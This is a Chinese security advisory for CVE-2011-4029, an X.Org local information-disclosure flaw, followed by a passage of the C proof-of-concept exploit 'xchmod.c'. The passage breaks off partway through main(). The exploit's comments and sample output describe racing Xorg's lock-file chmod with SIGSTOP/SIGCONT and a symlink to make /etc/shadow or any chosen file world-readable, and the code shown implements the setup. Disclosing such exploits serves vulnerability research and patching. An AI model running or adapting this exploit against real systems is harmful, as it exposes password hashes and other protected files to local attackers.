发布日期:2011-10-31
更新日期:2011-10-31
受影响系统:
Ubuntu Linux 11.x
Ubuntu Linux 10.x
X.org xorg-server 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50196
CVE ID: CVE-2011-4029
X.Org是X.Org Foundation对X窗口系统的开源实现。
X.Org X11在实现上存在信息泄露漏洞,本地攻击者可利用此漏洞获取本地文件内容。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* xchmod.c -- Xorg file permission change vulnerability PoC
Author: vladz ()
Date: 2011/10/27
Software:
Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and
earlier if built with the USE_CHMOD preprocessor identifier
Tested on: Debian 6.0.2 up to date with X default configuration
issued from the xserver-xorg-core package
(version 2:1.7.7-13)
CVE: CVE-2011-4029
This PoC sets the rights 444 (read for all) on any file specified as
argument (default file is "/etc/shadow"). Another good use for an
attacker would be to dump an entire partition in order to disclose its
full content later (via a "mount -o loop"). Made for EDUCATIONAL
PURPOSES ONLY!
In some configurations, this exploit must be launched from a TTY
(switch by typing Ctrl-Alt-Fn).
Tested on Debian 6.0.2 up to date with X default configuration issued
from the xserver-xorg-core package (version 2:1.7.7-13).
Compile: cc xchmod.c -o xchmod
Usage: ./xchmod [/path/to/file] (default file is /etc/shadow)
$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
$ ./xchmod
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 4134 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 4134 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
-----------------------------------------------------------------------
"THE BEER-WARE LICENSE" (Revision 42):
<vladz@devzero.fr> wrote this file. As long as you retain this notice
you can do whatever you want with this stuff. If we meet some day, and
you think this stuff is worth it, you can buy me a beer in return. -V.
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <syscall.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#define XORG_BIN "/usr/bin/X"
#define DISPLAY ":1"
char *get_tty_number(void) {
char tty_name[128], *ptr;
memset(tty_name, '\0', sizeof(tty_name));
readlink("/proc/self/fd/0", tty_name, sizeof(tty_name));
if ((ptr = strstr(tty_name, "tty")))
return ptr + 3;
return NULL;
}
int launch_xorg_instance(void) {
int child_pid;
char *opt[] = { XORG_BIN, DISPLAY, NULL };
if ((child_pid = fork()) == 0) {
close(1); close(2);
execve(XORG_BIN, opt, NULL);
_exit(0);
}
return child_pid;
}
void show_target_file(char *file) {
char cmd[128];
memset(cmd, '\0', sizeof(cmd));
sprintf(cmd, "/bin/ls -l %s", file);
system(cmd);
}
int main(int argc, char **argv) {
pid_t proc;
struct stat st;
int n, ret, current_attempt = 800;
char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
if (argc < 2)
strcpy(target_file, "/etc/shadow");
else
strcpy(target_file, argv[1]);
sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);